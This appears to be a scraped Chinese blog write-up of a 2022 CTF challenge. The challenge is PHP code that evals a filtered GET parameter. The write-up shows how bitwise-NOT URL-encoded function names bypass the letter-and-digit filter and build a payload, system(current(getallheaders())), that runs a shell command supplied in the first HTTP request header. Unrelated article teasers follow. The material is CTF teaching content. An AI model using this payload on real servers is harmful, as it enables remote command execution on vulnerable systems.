[鹏城杯 2022]简单的php - 无数字字母RCE+取反【*】

news/2024/5/19 22:26:04 标签: web安全, 安全, ctf, php, RCE, 无数字字母绕过, 取反

[鹏城杯 2022]简单的php

  • 一、解题流程
  • 二、思考总结

在这里插入图片描述
题目代码:

php"><?php
show_source(__FILE__);
    $code = $_GET['code'];
    if(strlen($code) > 80 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/is',$code)){
        die(' Hello');
    }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
        @eval($code);
    }
?> 

一、解题流程

  1. 分析
    参数:code
    特点:1、参数值长度不能超过80
       2、不能输入数字字母,仅这一点就可以排除常规做法。所以这题利用取反+RCE来做
       3、我们执行的部分在else if中
  2. 取反echo urlencode(~("phpinfo")); 得到%8F%97%8F%96%91%99%90
    //固定写法,注意不要带括号
    //注意:只对关键字取反
  3. 传参:?code=[~%8F%97%8F%96%91%99%90][!%FF]();
    //固定写法,[!%FF]作为()的衔接,用二维数组进行拼接需要[!%FF]分割
    //注意:[!%FF]是0的意思,因为前面是个数组,取里面的第0项才是木马
    可以发现页面执行了
    2
  4. 构造system(current(getallheaders()))
    分别对关键字进行取反操作,代码如下:
    php">echo urlencode(~("system")); //~%8C%86%8C%8B%9A%92
    echo "\n";
    echo urlencode(~("current")); //~%9C%8A%8D%8D%9A%91%8B
    echo "\n";
    echo urlencode(~("getallheaders")); //~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C 
    
    [~%8C%86%8C%8B%9A%92][!%FF]([~%9C%8A%8D%8D%9A%91%8B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]()))
    
  5. 构造payload
    payload=?code=[~%8C%86%8C%8B%9A%92][!%FF]([~%9C%8A%8D%8D%9A%91%8B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]()));
    system(current(getallheaders()))这个语句执行会将 请求头字段当做system内部命令执行,[!%FF]取第一个请求头字段
  6. payload只是get传参,而要真正rce,还得修改请求头字段
    burp
    注意第五步的说法,这里但凡不在第一个请求头字段,都不行哟~
    burp
  7. cat flag
    f

二、思考总结

这题涉及新的知识点。
1、urlencode(~(“xx”)); 取反操作
2、system(current(getallheaders())) 及其作用:将请求头字段当做system内部命令执行
3、[~xx][!%FF]([~xx][!%FF]([~xx][!%FF]())) 取反组合


http://www.niftyadmin.cn/n/5073680.html

相关文章

JVM垃圾回收之JVM GC算法探究

JVM垃圾回收之JVM GC算法探究 在Java虚拟机&#xff08;JVM&#xff09;中&#xff0c;垃圾回收&#xff08;Garbage Collection&#xff0c;GC&#xff09;是自动管理内存的重要机制&#xff0c;它负责回收程序中不再使用的对象所占用的内存。GC算法是垃圾回收的核心&#xf…

第八章 排序 十四、最佳归并树

目录 一、定义 二、多路最佳归并树 三、多路最佳归并树少了一个归并段 四、总结 一、定义 最佳归并树是指将若干个有序序列合并成一个有序序列的一种方式&#xff0c;使得所有合并操作的总代价最小的一棵二叉树。其中&#xff0c;代价通常指合并两个有序序列的操作次数或比…

代码随想录算法训练营第四十一天 | 509. 斐波那契数、70. 爬楼梯、746. 使用最小花费爬楼梯

509. 斐波那契数 链接&#xff1a; 代码随想录 视频&#xff1a;手把手带你入门动态规划 | LeetCode&#xff1a;509.斐波那契数_哔哩哔哩_bilibili &#xff08;1&#xff09;代码 70. 爬楼梯 链接&#xff1a; 代码随想录 视频&#xff1a;带你学透动态规划-爬楼梯&#xff…

汇编语言是怎么一回事?

汇编语言基础 汇编指令和机器码的区别 数据的表示 各类汇编指令 数据传送和算法运算 位运算 条件分支指令 函数调用 字符串处理 流水线和指令调度 流水线实现指令级并行 编译器指令调度 CPU乱序与投机执行 汇编器将汇编语言翻译成 CPU 可以执行的机器码&#xff0c…

【数据结构-二叉树 九】【树的子结构】:树的子结构

废话不多说&#xff0c;喊一句号子鼓励自己&#xff1a;程序员永不失业&#xff0c;程序员走向架构&#xff01;本篇Blog的主题是【子结构】&#xff0c;使用【二叉树】这个基本的数据结构来实现&#xff0c;这个高频题的站点是&#xff1a;CodeTop&#xff0c;筛选条件为&…

C/C++ 中的函数返回局部变量以及局部变量的地址?

C/C中&#xff0c;函数内部的一切变量(函数内部局部变量&#xff0c;形参)都是在其被调用时才被分配内存单元。形参和函数内部的局部变量的生命期和作用域都是在函数内部(static变量的生命期除外)。子函数运行结束时&#xff0c;所有局部变量的内存单元会被系统释放。在C中&…

[SWPUCTF 2021 新生赛]sql - 联合注入

[SWPUCTF 2021 新生赛]sql 一、思路分析二、解题流程 一、思路分析 这题可以参考文章&#xff1a;[SWPUCTF 2021 新生赛]easy_sql - 联合注入||报错注入||sqlmap 这题相比于参考文章的题目多了waf过滤 二、解题流程 首先&#xff0c;仍然是网站标题提示参数是wllm 1、fuzz看…

HTTPS工作过程,国家为什么让http为什么要换成https,Tomcat在MAC M1电脑如何安装,Tomcat的详细介绍

目录 引言 一、HTTPS工作过程 二、Tomcat 在访达中找到下载好的Tomcat文件夹&#xff08;这个要求按顺序&#xff09; zsh: permission denied TOMCAT的各部分含义&#xff1a; 引言 在密码中一般是&#xff1a;明文密钥->密文&#xff08;加密&#xff09; &#xff…